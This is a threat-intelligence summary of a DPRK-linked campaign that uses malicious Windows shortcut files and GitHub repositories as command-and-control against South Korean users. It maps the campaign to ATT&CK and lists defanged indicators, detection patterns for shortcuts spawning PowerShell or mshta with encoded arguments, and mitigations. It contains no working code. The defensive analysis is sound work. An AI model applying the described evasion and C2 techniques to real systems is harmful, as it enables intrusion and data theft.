Full Report
A series of malicious LNK files targeting users in South Korea has been detected using a multi-stage attack chain that uses GitHub as command and control (C2) infrastructure. The campaign relies on scripting, encoded payloads and legitimate Windows tools to maintain persistence while avoiding detection. Earlier versions of the attack date back to 2024 but…
Analysis Summary
# Tool/Technique: GitHub-Based Multi-Stage LNK Campaign
## Overview
This entry describes a sophisticated multi-stage attack chain targeting South Korean users. The threat involves the use of malicious Windows Shortcut (LNK) files that initiate a series of scripts to download payloads and establish a covert command-and-control (C2) channel utilizing legitimate GitHub repositories.
## Technical Details
- **Type**: Malware / Multi-stage Infection Chain
- **Platform**: Windows
- **Capabilities**: Script execution, payload encoding/obfuscation, persistence, and C2 communication via GitHub.
- **First Seen**: Earlier variants detected in 2024; updated versions observed in April 2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566 - Phishing] (Likely delivery mechanism for LNK files)
- **[TA0002 - Execution]**
- [T1204.001 - User Execution: Malicious Link]
- [T1059.005 - Command and Scripting Interpreter: Visual Basic]
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0003 - Persistence]**
- [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder]
- **[TA0005 - Defense Evasion]**
- [T1132.001 - Data Encoding: Standard Encoding] (Base64/hex encoding of payloads)
- [T1218 - System Binary Proxy Execution] (Living-off-the-Land Binaries)
- [T1027 - Obfuscated Files or Information]
- **[TA0011 - Command and Control]**
- [T1102.002 - Web Service: Bidirectional Communication] (Abusing GitHub as C2)
## Functionality
### Core Capabilities
- **Scripting Orchestration**: Uses Windows LNK files to trigger secondary scripts (VBScript/PowerShell).
- **Encoded Payload Handling**: Decodes and executes various stages of the attack from obfuscated scripts to avoid string-based detection.
- **Living-off-the-Land (LotL)**: Utilizes legitimate Windows tools to download and execute malicious code, minimizing the footprint on the disk.
### Advanced Features
- **GitHub as C2**: Instead of traditional domains, the malware communicates with GitHub repositories to fetch commands or upload stolen data, making the traffic appear legitimate and bypassing many firewall restrictions.
- **Evolving Obfuscation**: Modern versions have removed metadata found in 2024 samples and implemented more complex obfuscation to hinder researcher analysis.
## Indicators of Compromise
*Note: Specific hashes were not provided in the summary article; consult the referenced Fortinet advisory for full lists.*
- **File Names**: Malicious LNK files (often masquerading as legitimate documents in South Korean contexts).
- **Network Indicators**:
- `github[.]com/[account_name]/[repo_name]` (Covert channel)
- `raw.githubusercontent[.]com/...`
- **Behavioral Indicators**:
- `cmd.exe` or `powershell.exe` spawned directly from an `.lnk` file execution.
- Outbound connections to GitHub from non-developer applications.
## Associated Threat Actors
- **North Korean Nexus (DPRK)**: Per Fortinet's advisory, this campaign is linked to DPRK-related cyber activities targeting South Korean interests.
## Detection Methods
- **Behavioral Detection**: Monitor for `lnk` files that launch `cmd.exe`, `powershell.exe`, or `mshta.exe` with suspicious command-line arguments (e.g., encoded strings or URLs).
- **Network Monitoring**: Identifying anomalous traffic to GitHub, specifically look for repetitive requests to specific "README" or "Issues" pages where C2 commands might be hosted.
- **Endpoint Detection**: Audit the creation of scripts in `%TEMP%` or `%APPDATA%` folders following the opening of a downloaded shortcut.
## Mitigation Strategies
- **User Education**: Train users to identify suspicious shortcut files and avoid clicking on unexpected attachments.
- **File Association**: Restrict or monitor the execution of LNK files from untrusted zones (e.g., browser downloads or email attachments).
- **Network Filtering**: Implement SSL inspection to monitor GitHub traffic for non-standard usage or suspicious repository paths.
- **AppLocker/WDAC**: Implement application whitelisting to prevent unauthorized scripts or binaries from executing.
## Related Tools/Techniques
- **Gist-based C2**: Similar to GitHub repo C2, utilizing GitHub Gists for payload hosting.
- **Living-off-the-Land (LotL)**: Common technique used by North Korean actors like Lazarus or Kimsuky.